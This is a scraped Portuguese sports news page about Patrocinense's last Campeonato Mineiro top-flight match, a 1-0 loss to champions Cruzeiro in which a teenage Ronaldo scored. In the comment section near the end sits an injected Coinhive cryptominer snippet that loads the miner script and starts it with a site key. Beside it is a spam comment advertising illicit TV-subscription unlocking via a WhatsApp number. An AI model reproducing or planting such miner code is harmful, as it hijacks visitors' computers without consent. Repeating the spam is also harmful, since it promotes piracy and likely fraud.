logo

17/1/2018 12:46

Cruzeiro campeão, R9 rumo ao tetra e Mineirão raiz: o último jogo do CAP na elite do Mineiro

Patrocinense enfrentou o Cruzeiro que comemorava o título estadual antecipado, recebia a taça e contava com o então menino Ronaldo se despedindo do clube antes da Copa nos EUA; relembre

Cruzeiro campeão, R9 rumo ao tetra e Mineirão raiz: o último jogo do CAP na elite do Mineiro
Protagonistas do gol: Ronaldo Fenômeno recebeu cruzamento de Paulo Roberto (à direita) e escorou de cabeça para marcar (Foto: Reprodução SporTV)

Que o Patrocinense volta à elite do Campeonato Mineiro nesta quarta-feira contra o América-MG, no Independência, todo mundo sabe. Mas o torcedor do CAP se lembra da última partida do time grená na elite do Campeonato Estadual? A cidade foi a mesma da noite desta quarta: Belo Horizonte. O adversário e o estádio, porém, eram outros. A despedida do Patrocinense antes do retorno após 23 anos foi contra o Cruzeiro, no Mineirão. Quem estava por lá também era um Ronaldo, ainda menino, com 17 anos, dando o cartão de visitas antes de se tornar o Fenômeno. Fez o gol da vitória do Cruzeiro por 1 a 0 e ainda teve um golaço anulado pela arbitragem. Era a despedida dele antes de apresentar à Seleção que seria tetracampeã na Copa do Mundo nos EUA.



A partida foi no dia 15 de maio daquele ano. O jogo era de festa para torcida celeste. O time da capital conquistara o Estadual na rodada anterior depois de vencer a Caldense por 5 a 3, em Poços de Caldas. Ronaldo – que dava mostras do que faria na carreira – era, de longe, o artilheiro da competição: terminou o Campeonato Mineiro com 22 gols – 13 a mais que o vice-artilheiro, Cleison, da Raposa, que terminou a competição com nove tentos. Números que garantiram a ele a convocação para a primeira Copa do Mundo.

O Mineirão estava longe de ser a versão atual. As arquibancadas ainda eram de cimento, a geral ainda existia e os sinalizadores – e os foguetes dentro do gramado – eram liberados.

O Patrocinense chegava ao Mineirão precisando vencer o campeão estadual, na casa dele e em dia de festa da torcida. Na rodada anterior, o time grená tinha perdido em casa para o Atlético Três Corações por 1 a 0, ultrapassado na tabela pelo adversário e ficado na zona de rebaixamento. O Cruzeiro, porém, marcou aos oito minutos com Ronaldo. Gol que definiu a partida.

O artilheiro do estadual e futuro fenômeno ainda fez um golaço na primeira etapa depois de receber o lançamento de Dida. No entanto, apesar de ter concluído a jogada, o gol de R9 foi anulado por ter recebido a bola em impedimento.

O Patrocinense visita o América-MG às 19h30 desta quarta-feira, no Independência. O Canal Premiere transmite com Bernardo Edler e André Loffredo. O GloboEsporte.com acompanha a partida em Tempo Real a partir das 19h.

2388 visitas - Fonte: Globo Esporte




Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.